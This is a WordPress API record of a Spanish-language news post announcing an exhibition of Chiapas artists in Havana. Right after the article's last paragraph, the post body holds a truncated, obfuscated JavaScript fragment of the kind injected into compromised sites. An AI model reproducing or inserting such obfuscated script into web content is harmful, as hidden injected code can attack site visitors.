{"id":14702,"date":"2024-03-16T05:32:03","date_gmt":"2024-03-16T05:32:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14702"},"modified":"2024-03-16T05:32:04","modified_gmt":"2024-03-16T05:32:04","slug":"artistas-chiapanecos-expondran-en-cuba","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14702","title":{"rendered":"Artistas chiapanecos expondr\u00e1n en Cuba"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-1024x682.jpg\" alt=\"\" class=\"wp-image-14703\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-2048x1365.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240315-WA0261-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Con el apoyo financiero del National Museum Of Mexican Art y Portales del Arte en Chiapas, un destacado grupo de artistas pl\u00e1sticos est\u00e1 preparado para representar a Chiapas en una exhibici\u00f3n en la isla caribe\u00f1a de Cuba. La exposici\u00f3n colectiva, que se llevar\u00e1 a cabo en la prestigiosa Casa del Benem\u00e9rito de las Am\u00e9ricas Benito Ju\u00e1rez Garc\u00eda, en La Habana, promete ser un evento cultural trascendental.En conferencia de prensa, los artistas compartieron detalles sobre el evento, revelando que la iniciativa se titula &#8220;Contrastes del Arte en Chiapas&#8221;. Este encuentro especial, programado para inaugurar el 28 de marzo, ser\u00e1 un testimonio de la hermandad entre M\u00e9xico y Cuba a trav\u00e9s del arte.La exhibici\u00f3n contar\u00e1 con tres momentos distintivos, cada uno destacando diferentes formas de expresi\u00f3n art\u00edstica. Desde artes pl\u00e1sticas y grabados hasta murales y fotograf\u00edas, &#8220;la diversidad creativa ser\u00e1 evidente en cada rinc\u00f3n de la Casa del Benem\u00e9rito de las Am\u00e9ricas Benito Ju\u00e1rez Garc\u00eda. Entre los participantes se encuentran nombres reconocidos como Juan Chswuk y Marco Gir\u00f3n, este \u00faltimo conocido por su excepcional trabajo como fot\u00f3grafo&#8221;.&#8221;El evento no solo servir\u00e1 como una plataforma para exhibir el talento chiapaneco, sino que tambi\u00e9n fomentar\u00e1 el intercambio cultural y la colaboraci\u00f3n art\u00edstica entre M\u00e9xico y Cuba. Se espera que &#8220;Contrastes del Arte en Chiapas&#8221; sea un hito significativo en el panorama art\u00edstico internacional, consolidando a\u00fan m\u00e1s los lazos entre estas dos naciones hermanas a trav\u00e9s del poder transformador del arte&#8221;, concluyeron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- Con el apoyo financiero del National Museum Of Mexican Art y Portales del Arte en Chiapas, un destacado grupo de artistas pl\u00e1sticos est\u00e1 preparado para representar a Chiapas en una exhibici\u00f3n en la isla caribe\u00f1a de Cuba. La exposici\u00f3n colectiva, que se llevar\u00e1 a cabo en la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14703,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14702","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14702"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14702\/revisions"}],"predecessor-version":[{"id":14704,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14702\/revisions\/14704"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14703"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}